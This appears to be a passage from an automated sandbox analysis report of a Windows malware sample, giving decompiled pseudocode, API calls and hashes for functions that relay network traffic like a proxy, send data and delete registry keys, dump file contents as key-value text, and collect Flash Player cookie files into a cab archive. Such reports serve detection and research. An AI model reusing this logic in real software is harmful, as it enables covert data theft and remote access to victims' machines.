				intOrPtr _t129;
				void* _t130;

				_t116 = _a4;
				_push( &_v28);
				_push(_a4);
				_t54 = 7;
				if(E0040E250(_t54) != 0) {
					_t104 = 1;
					while(E0040E250(_t104, _t116,  &_v9) != 0) {
						if(_v9 == 0) {
							_t108 = _v25;
							_v13 = 0x5a;
							if(((_v25 & 0x00ff0000 | _v25 >> 0x00000010) >> 0x00000008 | (_t108 & 0x0000ff00 | _t108 << 0x00000010) << 0x00000008) - 1 > 0xfe) {
								L21:
								_v9 = 1;
								if(_v13 != 0x5a) {
									L47:
									return E0040EDF8(_a4, 0xffffffff, _v13, 0) & 0xffffff00 | _t65 != 0x00000000;
								}
								E0040CFFE( &_v44,  &_v44, 0, 0x10);
								_t69 = 2;
								_v44 = _t69;
								_t71 = (_v28 & 0x000000ff) - 1;
								if(_t71 == 0) {
									_v42 = _v27;
									_v40 = _v25;
									_t74 = E0040E29E( &_v44, 0x10);
									_t124 = _t74;
									if(_t74 == 0xffffffff) {
										L24:
										_v13 = 0x5b;
										goto L47;
									}
									_t75 = E0040EDF8(_a4, _t124, 0x5a, 0);
									if(_t75 != _t104) {
										if(_t75 != 0xffffffff) {
											_v9 = 0;
										} else {
											_v13 = 0x5b;
										}
									} else {
										E0040E319(_t124, _a4);
									}
									E0040E441(_t124);
									if(_v9 != 1 || _v13 == 0x5a) {
										L37:
										return _v9;
									} else {
										goto L47;
									}
								}
								if(_t71 == 1) {
									_t125 = E0040E2D4( &_v44, 0x10, _t104);
									_v20 = _t125;
									if(_t125 == 0xffffffff) {
										goto L24;
									}
									_t120 = E0040EDF8(_a4, _t125, 0x5a, 0);
									if(_t120 != _t104) {
										E0040E441(_t125);
										L34:
										if(_t120 == 0xffffffff) {
											goto L24;
										}
										if(_t120 != _t104) {
											_v9 = 0;
										}
										goto L37;
									}
									_t106 = E0040E3BF( &_v20,  &_a4);
									if(_t106 != 0xffffffff) {
										_t106 =  *0x412bd8(_t106, 0, 0);
									}
									E0040E441(_v20);
									if(_t106 == 0xffffffff) {
										goto L24;
									} else {
										_t122 = _a4;
										_t86 = E0040EDF8(_a4, _t106, 0x5a, 2);
										_v20 = _t86;
										if(_t86 == 1) {
											E0040E319(_t106, _t122);
										}
										E0040E441(_t106);
										_t120 = _v20;
										_t104 = 1;
										goto L34;
									}
								}
								goto L24;
							}
							_t128 = 0;
							while(E0040E250(_t104, _t116,  &_v9) != 0) {
								_t94 = _v9;
								 *((char*)(_t130 + _t128 - 0x12c)) = _t94;
								if(_t94 == 0) {
									_push( &_v20);
									_push(0);
									_push(0);
									_push( &_v304);
									_v20 = 0;
									if( *0x412be8() == 0) {
										_t129 = _v20;
										while(_t129 != 0) {
											if( *((intOrPtr*)(_t129 + 4)) == 2) {
												E0040CF7C( &_v25,  *((intOrPtr*)(_t129 + 0x18)) + 4, 4);
												L20:
												 *0x412bec(_v20);
												if(_t129 == 0) {
													goto L13;
												}
												goto L21;
											}
											_t129 =  *((intOrPtr*)(_t129 + 0x1c));
										}
										goto L20;
									}
									L13:
									_v13 = 0x5b;
									goto L21;
								}
								_t128 = _t128 + 1;
								if(_t128 <= 0xff) {
									continue;
								}
								goto L1;
							}
							goto L1;
						}
					}
				}
				L1:
				return 0;
			}






























    0x0040ee7a
    0x0040ee80
    0x0040ee81
    0x0040ee84
    0x0040ee8c
    0x0040ee97
    0x0040eea0
    0x0040ee9e
    0x0040eeb2
    0x0040eed9
    0x0040eee2
    0x0040ef6b
    0x0040ef6f
    0x0040ef73
    0x0040f0a3
    0x00000000
    0x0040f0b4
    0x0040ef81
    0x0040ef88
    0x0040ef89
    0x0040ef91
    0x0040ef92
    0x0040f047
    0x0040f053
    0x0040f056
    0x0040f05b
    0x0040f060
    0x0040ef9b
    0x0040ef9b
    0x00000000
    0x0040ef9b
    0x0040f06e
    0x0040f075
    0x0040f086
    0x0040f08e
    0x0040f088
    0x0040f088
    0x0040f088
    0x0040f077
    0x0040f07c
    0x0040f07c
    0x0040f092
    0x0040f09b
    0x0040f039
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040f09b
    0x0040ef99
    0x0040efaf
    0x0040efb1
    0x0040efb7
    0x00000000
    0x00000000
    0x0040efc6
    0x0040efca
    0x0040f023
    0x0040f028
    0x0040f02b
    0x00000000
    0x00000000
    0x0040f033
    0x0040f035
    0x0040f035
    0x00000000
    0x0040f033
    0x0040efd8
    0x0040efdd
    0x0040efea
    0x0040efea
    0x0040efef
    0x0040eff7
    0x00000000
    0x0040eff9
    0x0040eff9
    0x0040f002
    0x0040f007
    0x0040f00d
    0x0040f00f
    0x0040f00f
    0x0040f016
    0x0040f01b
    0x0040f020
    0x00000000
    0x0040f020
    0x0040eff7
    0x00000000
    0x0040ef99
    0x0040eee8
    0x0040eeea
    0x0040eefa
    0x0040eefd
    0x0040ef06
    0x0040ef19
    0x0040ef1c
    0x0040ef1d
    0x0040ef24
    0x0040ef25
    0x0040ef30
    0x0040ef38
    0x0040ef46
    0x0040ef41
    0x0040ef59
    0x0040ef5e
    0x0040ef61
    0x0040ef69
    0x00000000
    0x00000000
    0x00000000
    0x0040ef69
    0x0040ef43
    0x0040ef43
    0x00000000
    0x0040ef4a
    0x0040ef32
    0x0040ef32
    0x00000000
    0x0040ef32
    0x0040ef08
    0x0040ef0f
    0x00000000
    0x00000000
    0x00000000
    0x0040ef11
    0x00000000
    0x0040eeea
    0x0040ee9e
    0x0040eeb0
    0x0040ee8e
    0x00000000

    APIs
    • getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 0040EF28
    • FreeAddrInfoW.WS2_32(?), ref: 0040EF61
    • accept.WS2_32(00000000,00000000,00000000), ref: 0040EFE4
      • Part of subcall function 0040E441: shutdown.WS2_32(?,00000002), ref: 0040E449
      • Part of subcall function 0040E441: closesocket.WS2_32(?), ref: 0040E450
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AddrFreeInfoacceptclosesocketgetaddrinfoshutdown
    • String ID: Z
    • API String ID: 3598408102-1505515367
    • Opcode ID: 7ea22eb6468d9e9231e2ca8235e7fd27982b9e2e42f310e2c66d9ee4bb4fb59f
    • Instruction ID: f468557edf92106ed5e48b00aedf455d29ce3992e26420ef702732d383d78009
    • Opcode Fuzzy Hash: 7ea22eb6468d9e9231e2ca8235e7fd27982b9e2e42f310e2c66d9ee4bb4fb59f
    • Instruction Fuzzy Hash: EE615F31A00209AADF309AA6CC41BEF7B6A9F45354F040977FA50F72C2C2BC5956879E
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040822B, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 157networkCOMMON
    Download Yara Rule
    C-Code - Quality: 47%
    			E0040822B(intOrPtr _a4) {
				char _v76;
				char _v80;
				char _v84;
				intOrPtr _v88;
				void* _v92;
				char _v96;
				intOrPtr _v108;
				intOrPtr _v112;
				char _v124;
				intOrPtr _v140;
				void* __edi;
				void* __esi;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t55;
				void* _t68;
				void* _t81;
				intOrPtr* _t84;
				intOrPtr _t90;
				intOrPtr* _t93;

				_t90 = _a4;
				_push(0x2710);
				_t81 = 4;
				_push(_t81);
				_push( &_v84);
				if(E0040E1DD(_t90) != _t81 || E0040E1DD(_t90,  &_v96, _t81, 0x2710) != _t81) {
					L31:
					return E0040E441(_a4);
				} else {
					_t51 = _v96;
					if(_t51 > 0xffff || _t51 == 0) {
						goto L31;
					} else {
						_t52 = E0040CF2D(_t51);
						_v88 = _t52;
						if(_t52 == 0) {
							goto L31;
						}
						if(E0040E1DD(_t90, _t52, _v96, 0x2710) != _v108) {
							L30:
							E0040CF40(_v88);
							goto L31;
						}
						if(_v84 == 0xa) {
							_t55 =  *0x412a64; // 0x246f5a8
							_v80 = 0x32;
							_v92 = E0040D0A7( *((intOrPtr*)(_t55 + 0x70)));
							if(_v96 >= _t81) {
								_t87 = _v88;
								E0040CF7C( &_v80, _v88, _t81);
								_t75 = _v108;
								if(_v108 > _t81) {
									_v96 = E0040D379(_t75 + 0xfffffffc, _t87 + 4);
								}
							}
							if(_v92 == 0) {
								goto L30;
							} else {
								_t93 = E00407D61(_v92, _v80, 0);
								_v92 = _t93;
								if(_t93 == 0) {
									L29:
									E0040CF40(_v92);
									goto L30;
								}
								_push(1);
								_push( &_v76);
								_push(_t93);
								if( *((intOrPtr*)( *_t93 + 0x30))() != 0) {
									L28:
									 *((intOrPtr*)( *_t93 + 8))(_t93);
									goto L29;
								}
								_v76 = 0x1000;
								 *0x412bb4(_a4,  &_v80, 8, 0);
								_t65 = _v92;
								if(_v92 == 0) {
									goto L28;
								}
								_t84 = E0040CF2D(_t65);
								if(_t84 == 0) {
									goto L28;
								}
								while(1) {
									_t68 =  *((intOrPtr*)( *_t93 + 0xc))(_t93, _t84, _v92,  &_v124);
									if(_t68 != 0 || _v140 == _t68) {
										break;
									}
									_push(_t68);
									_push(_v140);
									_push(_t84);
									_push(_a4);
									if( *0x412bb4() == 0xffffffff) {
										break;
									}
									if(E0040E1DD(_a4, _t84, 4, 0x2710) != 4 ||  *_t84 != _v124) {
										_t93 = _v140;
										break;
									} else {
										_t93 = _v140;
										continue;
									}
								}
								E0040CF40(_t84);
								goto L28;
							}
						}
						if(_v84 == 0x14 && _v96 >= _t81) {
							_push(0);
							_push(_v96);
							_push(_v88);
							_push(_t90);
							if( *0x412bb4() == _v112) {
								E00409F45();
							}
						}
						goto L30;
					}
				}
			}























    0x00408237
    0x0040823f
    0x00408242
    0x00408243
    0x00408248
    0x00408250
    0x00408407
    0x00408415
    0x0040826a
    0x0040826a
    0x00408273
    0x00000000
    0x00408281
    0x00408281
    0x00408286
    0x0040828c
    0x00000000
    0x00000000
    0x004082a1
    0x004083fe
    0x00408402
    0x00000000
    0x00408402
    0x004082ac
    0x004082e8
    0x004082f0
    0x004082fd
    0x00408305
    0x00408307
    0x00408312
    0x00408317
    0x0040831d
    0x0040832b
    0x0040832b
    0x0040831d
    0x00408335
    0x00000000
    0x0040833b
    0x00408349
    0x0040834b
    0x00408351
    0x004083f5
    0x004083f9
    0x00000000
    0x004083f9
    0x00408359
    0x0040835f
    0x00408360
    0x00408366
    0x004083ef
    0x004083f2
    0x00000000
    0x004083f2
    0x00408377
    0x0040837f
    0x00408385
    0x0040838b
    0x00000000
    0x00000000
    0x00408392
    0x00408396
    0x00000000
    0x00000000
    0x0040839e
    0x004083ab
    0x004083b0
    0x00000000
    0x00000000
    0x004083b8
    0x004083b9
    0x004083bd
    0x004083be
    0x004083ca
    0x00000000
    0x00000000
    0x004083db
    0x004083e5
    0x00000000
    0x0040839a
    0x0040839a
    0x00000000
    0x0040839a
    0x004083db
    0x004083ea
    0x00000000
    0x004083ea
    0x00408335
    0x004082b3
    0x004082c3
    0x004082c5
    0x004082c9
    0x004082cd
    0x004082d8
    0x004082de
    0x004082de
    0x004082d8
    0x00000000
    0x004082b3
    0x00408273

    APIs
      • Part of subcall function 0040E1DD: select.WS2_32(00000000,?,00000000,00000000,00002710), ref: 0040E22D
      • Part of subcall function 0040E1DD: recv.WS2_32(?,?,?,00000000), ref: 0040E245
      • Part of subcall function 0040CF2D: RtlAllocateHeap.NTDLL(00000008,?,0040952C), ref: 0040CF39
    • send.WS2_32(?,00002710,00002710,00000000), ref: 004082CE
      • Part of subcall function 00409F45: GetCurrentThread.KERNEL32 ref: 00409F48
      • Part of subcall function 00409F45: SetThreadPriority.KERNEL32(00000000,?,00407523), ref: 00409F4F
      • Part of subcall function 00409F45: SHDeleteKeyA.SHLWAPI(80000001,?,?,00407523), ref: 00409F62
      • Part of subcall function 00409F45: SHDeleteKeyA.SHLWAPI(80000002,?,?,00407523), ref: 00409F76
      • Part of subcall function 00409F45: SHDeleteKeyA.SHLWAPI(80000002,?,?,00407523), ref: 00409F85
      • Part of subcall function 00409F45: Sleep.KERNEL32(000003E8,?,00407523), ref: 00409F90
    • send.WS2_32(?,00000000,00000008,00000000), ref: 0040837F
    • send.WS2_32(?,00000000,00002710,00000000), ref: 004083C1
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Deletesend$Thread$AllocateCurrentHeapPrioritySleeprecvselect
    • String ID: 2
    • API String ID: 4172955902-450215437
    • Opcode ID: add99a1411b4caff1b10f0ac08378719a653d1f3ebd264d18e46b9e0885d9899
    • Instruction ID: 18fe43ebdc9abdf3dc28419ad3a27aaa85eca5f66f5b0d38311b8ff00febec27
    • Opcode Fuzzy Hash: add99a1411b4caff1b10f0ac08378719a653d1f3ebd264d18e46b9e0885d9899
    • Instruction Fuzzy Hash: 7B519C71108302AFC710EF65C98092F77E9EF84758F10893EF994A62D2DB39E945CB5A
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00404550, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 106COMMON
    Download Yara Rule
    C-Code - Quality: 97%
    			E00404550(void* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v48;
				char _v52;
				char _v2104;
				void* __edi;
				void* __esi;
				intOrPtr _t47;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr* _t69;
				signed int _t74;
				intOrPtr _t77;
				signed int _t83;
				signed int _t85;
				void* _t86;

				_v12 = 0;
				if(E0040DC05(0, __ecx,  &_v52, _a4) != 0) {
					_t83 =  &_v24;
					_v24 = 0;
					_t47 = E00408F05(_v48, _v52, _t83);
					_v32 = _t47;
					if(_t47 != 0) {
						asm("sbb esi, esi");
						_t74 = _v24 - 9;
						_t85 =  !_t83 & _t74;
						_v16 = 0;
						_v20 = 0;
						if(_t85 > 0) {
							_t13 = _t47 + 4; // 0x4
							_t69 = _t13;
							while(1) {
								_t77 =  *((intOrPtr*)(_t69 - 4));
								_v36 = _t77;
								if(_t77 == 0) {
									break;
								}
								_t53 =  *_t69;
								_v28 = _t53;
								if(_t53 == 0) {
									break;
								} else {
									_t54 =  *((intOrPtr*)(_t69 + 4));
									_a4 = _t54;
									if(_t54 == 0) {
										break;
									} else {
										E0040D112(_t77);
										E0040D112(_v28);
										_t79 = _a4;
										E0040D112(_a4);
										if(_v16 == 0) {
											L9:
											wnsprintfA( &_v2104, 0x7ff, "\nPath: %s\n", _a4);
											_t86 = _t86 + 0x10;
											if(E00408EAC( &_v12,  &_v2104) == 0) {
												goto L14;
											} else {
												goto L10;
											}
										} else {
											_t74 = _t74 | 0xffffffff;
											if(E0040D3EC(_t74, _t79, _t74, _v16) == 0) {
												L10:
												wnsprintfA( &_v2104, 0x7ff, "%s=%s\n", _v36,  *_t69);
												_t86 = _t86 + 0x14;
												if(E00408EAC( &_v12,  &_v2104) == 0) {
													L14:
													_v12 = _v12 & 0x00000000;
												} else {
													_v20 = _v20 + 9;
													_t69 = _t69 + 0x24;
													_v16 = _a4;
													if(_v20 < _t85) {
														continue;
													} else {
													}
												}
											} else {
												goto L9;
											}
										}
									}
								}
								goto L15;
							}
							E0040CF40(_v12);
							goto L14;
						}
						L15:
						E0040CF5C(_v24, _v32);
					}
					E0040DCBE( &_v52);
				}
				return _v12;
			}
























    0x00404566
    0x00404570
    0x0040457c
    0x0040457f
    0x00404582
    0x00404587
    0x0040458c
    0x00404598
    0x0040459a
    0x0040459f
    0x004045a1
    0x004045a4
    0x004045a7
    0x004045ad
    0x004045ad
    0x004045b0
    0x004045b0
    0x004045b3
    0x004045b8
    0x00000000
    0x00000000
    0x004045be
    0x004045c0
    0x004045c5
    0x00000000
    0x004045cb
    0x004045cb
    0x004045ce
    0x004045d3
    0x00000000
    0x004045d9
    0x004045d9
    0x004045e1
    0x004045e6
    0x004045e9
    0x004045f2
    0x00404607
    0x0040461b
    0x00404621
    0x00404635
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004045f4
    0x004045f7
    0x00404605
    0x00404637
    0x0040464d
    0x00404653
    0x00404667
    0x00404689
    0x00404689
    0x00404669
    0x00404669
    0x00404670
    0x00404673
    0x00404679
    0x00000000
    0x00000000
    0x0040467f
    0x00404679
    0x00000000
    0x00000000
    0x00000000
    0x00404605
    0x004045f2
    0x004045d3
    0x00000000
    0x004045c5
    0x00404684
    0x00000000
    0x00404684
    0x0040468d
    0x00404693
    0x00404693
    0x0040469b
    0x0040469b
    0x004046a7

    APIs
      • Part of subcall function 0040DC05: CreateFileW.KERNEL32(?,00000000,?,00000000,00000003,00000000,00000000,00000000,00415FD6,?,?,?,00403A07,004124A8,?,00000006), ref: 0040DC31
      • Part of subcall function 0040DC05: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00403A07,004124A8,?,00000006,00000000,00000000,00000000,00000000), ref: 0040DC44
    • wnsprintfA.SHLWAPI ref: 0040461B
    • wnsprintfA.SHLWAPI ref: 0040464D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Filewnsprintf$CreateSize
    • String ID: Path: %s$%s=%s
    • API String ID: 2143265763-3969205073
    • Opcode ID: 8dd4956661a0e19bd514905204aa163be3177d280e5a379a68073fcbd262b9cc
    • Instruction ID: 5284e0f240df07e0d7c49856f8ac56b9ea4e37b3a254fcb1138128b2bcd1faf8
    • Opcode Fuzzy Hash: 8dd4956661a0e19bd514905204aa163be3177d280e5a379a68073fcbd262b9cc
    • Instruction Fuzzy Hash: 46418FB1D002099BCF00EF95C8419EEB7B5BF85314F15457AE900B72D1EB39AA45CF98
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00408723, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77networkCOMMON
    Download Yara Rule
    C-Code - Quality: 68%
    			E00408723(char _a4) {
				char _v9;
				char _v16;
				char _v416;
				intOrPtr _t19;
				intOrPtr _t20;
				void* _t23;
				char _t28;
				void* _t33;
				void* _t39;
				signed char _t42;
				void* _t46;

				_t19 =  *0x412a8c; // 0x416000
				_t1 = _t19 + 0x26; // 0x400000e
				_t2 = _t19 + 0x24; // 0xe001b
				_t39 = ( *_t1 & 0x000000ff) + _t19;
				_t3 = _t19 + 0x25; // 0xe00
				_t20 =  *_t3;
				_t5 = _t39 + 0x12c; // 0xe0147
				_t40 = ( *_t2 & 0x000000ff) + _t5;
				_t42 = 0;
				_v9 = 0;
				if(_t20 > 0) {
					while(1) {
						_t46 =  *((intOrPtr*)(_t40 + (_t42 & 0x000000ff) * 2)) -  *0x412a78; // 0x409
						if(_t46 == 0) {
							break;
						}
						_t42 = _t42 + 1;
						if(_t42 < _t20) {
							continue;
						} else {
						}
						goto L5;
					}
					_v9 = 1;
				}
				L5:
				L00403961();
				 *0x412dd0(0x4126b0);
				 *0x412970 =  *0x412970 + 1;
				_t23 = E0040A04D(_t40, E00403D72, 0x412706);
				if(_v9 == 0) {
					E004085E6();
					 *0x412bdc(0x202,  &_v416);
					 *0x412970 =  *0x412970 + 1;
					E0040A04D(_t40, E00408464, 0);
					_t28 =  *0x412974; // 0x0
					_v16 = _t28;
					E00410B83();
					 *0x412970 =  *0x412970 + 1;
					 *0x412dd0(0x4126c8, _a4,  &_v16);
					 *0x412970 =  *0x412970 + 1;
					 *0x4126e4 = 0;
					 *0x4126e0 = 0;
					_a4 = 0;
					_t33 = E00407945( &_a4, _t40, 0, "PopOpO03-3331111");
					_t49 = _t33;
					if(_t33 != 0) {
						_t40 = _t33;
						E004043BC(_a4, _t33, _t49);
						E0040CF40(_a4);
					}
					_t23 = E0040A04D(_t40, E004042F5, 0x412970);
					if(_t23 != 0) {
						 *0x412970 =  *0x412970 - 1;
						return _t23;
					}
				}
				return _t23;
			}














    0x0040872c
    0x00408731
    0x00408735
    0x00408739
    0x0040873b
    0x0040873b
    0x00408741
    0x00408741
    0x00408748
    0x0040874b
    0x00408750
    0x00408752
    0x00408759
    0x00408760
    0x00000000
    0x00000000
    0x00408762
    0x00408766
    0x00000000
    0x00000000
    0x00408768
    0x00000000
    0x00408766
    0x0040876a
    0x0040876a
    0x0040876e
    0x0040876e
    0x00408778
    0x0040877e
    0x0040878e
    0x00408796
    0x0040879c
    0x004087ad
    0x004087b3
    0x004087bf
    0x004087c4
    0x004087c9
    0x004087d3
    0x004087d8
    0x004087e3
    0x004087e9
    0x004087f8
    0x004087fe
    0x00408804
    0x00408807
    0x0040880c
    0x0040880e
    0x00408810
    0x00408815
    0x0040881d
    0x0040881d
    0x0040882c
    0x00408833
    0x00408835
    0x00000000
    0x00408835
    0x00408833
    0x0040883e

    APIs
    • RtlInitializeCriticalSection.NTDLL(004126B0), ref: 00408778
    • WSAStartup.WS2_32(00000202,?), ref: 004087AD
    • RtlInitializeCriticalSection.NTDLL(004126C8), ref: 004087E3
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CriticalInitializeSection$Startup
    • String ID: PopOpO03-3331111
    • API String ID: 100036477-962168976
    • Opcode ID: 0901eebd5d8b5c639a9aa01764fffd2912665666cc28b7abaa37baa4a33bf8b9
    • Instruction ID: 68e7f338d6abc91738887d919ae094527a9c08cbd5483efdfb38f39f2fc3d448
    • Opcode Fuzzy Hash: 0901eebd5d8b5c639a9aa01764fffd2912665666cc28b7abaa37baa4a33bf8b9
    • Instruction Fuzzy Hash: 562126B5200204AEC710AFB8DE819ED3BB5BB05344F10807FB481F31E3DAB944658B6E
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040F6C1, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74memoryCOMMON
    Download Yara Rule
    C-Code - Quality: 86%
    			E0040F6C1() {
				WCHAR* _v4;
				void* _t25;
				intOrPtr _t27;
				WCHAR* _t33;
				intOrPtr* _t35;

				_t33 = 0;
				if(E0040F5DA() != 0) {
					_t35 = RtlAllocateHeap( *0x413e5c, 8, 0x954);
					if(_t35 == 0) {
						L7:
						E0040F6A0();
					} else {
						_t2 = _t35 + 0x53e; // 0x53e
						if(PathCombineW(_t2, _v4, 0) == 0) {
							L6:
							E0040CF40(_t35);
							goto L7;
						} else {
							_t3 = _t35 + 0x746; // 0x746
							if((GetTempPathW(0x103, _t3) & 0xffffff00 | _t21 > 0x00000000) == 0) {
								goto L6;
							} else {
								 *((intOrPtr*)(_t35 + 0x14)) = 0x7fffffff;
								_t7 = _t35 + 0x10; // 0x10
								 *_t7 = 0x7fffffff;
								 *((intOrPtr*)(_t35 + 0x24)) = 1;
								 *((intOrPtr*)(_t35 + 0x28)) = 1;
								_t10 = _t35 + 0x132; // 0x132
								E0040CF7C(_t10, "cabinet.dll", 0xc);
								_t11 = _t35 + 0x232; // 0x232
								_t25 = E0040CF7C(_t11, "?O", 2);
								_t12 = _t35 + 4; // 0x4
								_t27 =  *0x41348c(_t12, E0040F546, E0040F29A, E0040F2AD, E0040F2C0, E0040F3AC, E0040F3E3, E0040F429, E0040F44A, E0040F494, E0040F4CE, _t25, _t35);
								 *_t35 = _t27;
								if(_t27 == 0) {
									goto L6;
								} else {
									_t33 = _t35;
								}
							}
						}
					}
				}
				return _t33;
			}








    0x0040f6c2
    0x0040f6cb
    0x0040f6e5
    0x0040f6e9
    0x0040f7b5
    0x0040f7b5
    0x0040f6ef
    0x0040f6f4
    0x0040f703
    0x0040f7af
    0x0040f7b0
    0x00000000
    0x0040f709
    0x0040f709
    0x0040f722
    0x00000000
    0x0040f728
    0x0040f72d
    0x0040f730
    0x0040f733
    0x0040f73a
    0x0040f73d
    0x0040f745
    0x0040f74c
    0x0040f758
    0x0040f75f
    0x0040f793
    0x0040f79c
    0x0040f7a5
    0x0040f7a9
    0x00000000
    0x0040f7ab
    0x0040f7ab
    0x0040f7ab
    0x0040f7a9
    0x0040f722
    0x0040f703
    0x0040f7ba
    0x0040f7be

    APIs
      • Part of subcall function 0040F5DA: LoadLibraryA.KERNEL32(cabinet.dll,00000000,0040F6C9,00000000,0040F9A3,?,00000000,00000000, L@,00410FEB,?, L@,?), ref: 0040F5EE
      • Part of subcall function 0040F5DA: GetProcAddress.KERNEL32(00000000,FCICreate), ref: 0040F607
      • Part of subcall function 0040F5DA: GetProcAddress.KERNEL32(FCIAddFile), ref: 0040F61D
      • Part of subcall function 0040F5DA: GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 0040F633
      • Part of subcall function 0040F5DA: GetProcAddress.KERNEL32(FCIDestroy), ref: 0040F649
      • Part of subcall function 0040F5DA: HeapCreate.KERNEL32(00000000,00080000,00000000), ref: 0040F677
      • Part of subcall function 0040F5DA: FreeLibrary.KERNEL32 ref: 0040F68C
    • RtlAllocateHeap.NTDLL(00000008,00000954,00000000), ref: 0040F6DF
    • PathCombineW.SHLWAPI(0000053E,?,00000000), ref: 0040F6FB
    • GetTempPathW.KERNEL32(00000103,00000746), ref: 0040F715
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AddressProc$HeapLibraryPath$AllocateCombineCreateFreeLoadTemp
    • String ID: cabinet.dll
    • API String ID: 3318130981-741892446
    • Opcode ID: 836055a5f4ea86037d5b926fb0e0e232a533c344921eb610ed3dc3d28b078de8
    • Instruction ID: a6f59f06e4f78d13bfff6456a59f94fa6463616f34fb44b764fa5119b8882f09
    • Opcode Fuzzy Hash: 836055a5f4ea86037d5b926fb0e0e232a533c344921eb610ed3dc3d28b078de8
    • Instruction Fuzzy Hash: 35210E31280701BBD230AF219C06F9777A9AB45B01B10853FB942B3AC1DBBCE50C8B1D
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00410F88, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00410F88(void* __ecx, void* __edx, char _a4) {
				short _v528;
				short _v1048;
				void* _t20;
				int _t25;
				void* _t26;
				void* _t27;

				_t27 = __edx;
				_t26 = __ecx;
				_t25 = 0;
				if(GetTempPathW(0xf6,  &_v1048) - 1 <= 0xf5 && GetTempFileNameW( &_v1048, 0x40391c, 0,  &_v528) > 0 && E0040DD3C( &_v528) != 0) {
					_t5 =  &_a4; // 0x404c20
					_t20 = E0040F994( &_v528,  *_t5);
					_t31 = _t20;
					if(_t20 != 0) {
						_t25 = E00410F35(_t26, _t27, _t31,  &_v528, _a4, L"mfplayer_cfg.cab");
						E0040DD3C( &_v528);
					}
				}
				return _t25;
			}









    0x00410f88
    0x00410f88
    0x00410f9e
    0x00410fac
    0x00410fdc
    0x00410fe6
    0x00410feb
    0x00410fed
    0x00411003
    0x0041100c
    0x0041100c
    0x00410fed
    0x00411015

    APIs
    • GetTempPathW.KERNEL32(000000F6,?,00000000), ref: 00410FA0
    • GetTempFileNameW.KERNEL32(?,0040391C,00000000,?), ref: 00410FC2
      • Part of subcall function 0040DD3C: SetFileAttributesW.KERNELBASE(?,00000020,0040FBDD,?,?,?,00000000), ref: 0040DD42
      • Part of subcall function 0040DD3C: DeleteFileW.KERNELBASE(00000000,?,?,00000000), ref: 0040DD4C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$Temp$AttributesDeleteNamePath
    • String ID: L@$mfplayer_cfg.cab
    • API String ID: 838033943-3102061355
    • Opcode ID: 99eda8daf4d12136975021dbd60b525d7649a2c91204e152e61939720c1b4439
    • Instruction ID: 7937309a437ccfda3a51056a1d76e2cf1b653a5aa8002bdd0aa36495cddce824
    • Opcode Fuzzy Hash: 99eda8daf4d12136975021dbd60b525d7649a2c91204e152e61939720c1b4439
    • Instruction Fuzzy Hash: 3F014FB194021C6ACF20AFA4DD89FDA777C9B08744F1084B7B604E7192D67CDAC99B28
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00404BC8, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38COMMON
    Download Yara Rule
    C-Code - Quality: 75%
    			E00404BC8(intOrPtr _a4) {
				short _v528;
				void* __edi;
				void* _t8;
				void* _t15;

				_t8 =  *0x412a6c(0,  &_v528, 0x1a, 0);
				if(_t8 != 0) {
					PathCombineW( &_v528,  &_v528, L"Macromedia\\Flash Player");
					if(_a4 == 0) {
						_t8 = E00410F88(_t14, _t15,  &_v528);
					} else {
						_t14 =  &_v528;
						_t8 = E0040A077( &_v528, L"*.sol");
					}
				}
				if(_a4 != 0) {
					return _t8;
				} else {
					return E004046AA(_t14, 0, 2, 0);
				}
			}







    0x00404be0
    0x00404be8
    0x00404bf7
    0x00404c00
    0x00404c1b
    0x00404c02
    0x00404c07
    0x00404c0d
    0x00404c0d
    0x00404c00
    0x00404c23
    0x00404c32
    0x00404c25
    0x00000000
    0x00404c2a

    APIs
    • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,00000000,00000000), ref: 00404BE0
    • PathCombineW.SHLWAPI(?,?,Macromedia\Flash Player), ref: 00404BF7
      • Part of subcall function 0040A077: PathCombineW.SHLWAPI(?,?,00401040,00000000,00000000,00000000), ref: 0040A09A
      • Part of subcall function 0040A077: FindFirstFileW.KERNEL32(?,?), ref: 0040A0AD
      • Part of subcall function 0040A077: PathMatchSpecW.SHLWAPI(?,?), ref: 0040A0F8
      • Part of subcall function 0040A077: PathCombineW.SHLWAPI(?,?,0000002E), ref: 0040A110
      • Part of subcall function 0040A077: FindNextFileW.KERNEL32(00000000,?,?), ref: 0040A14B
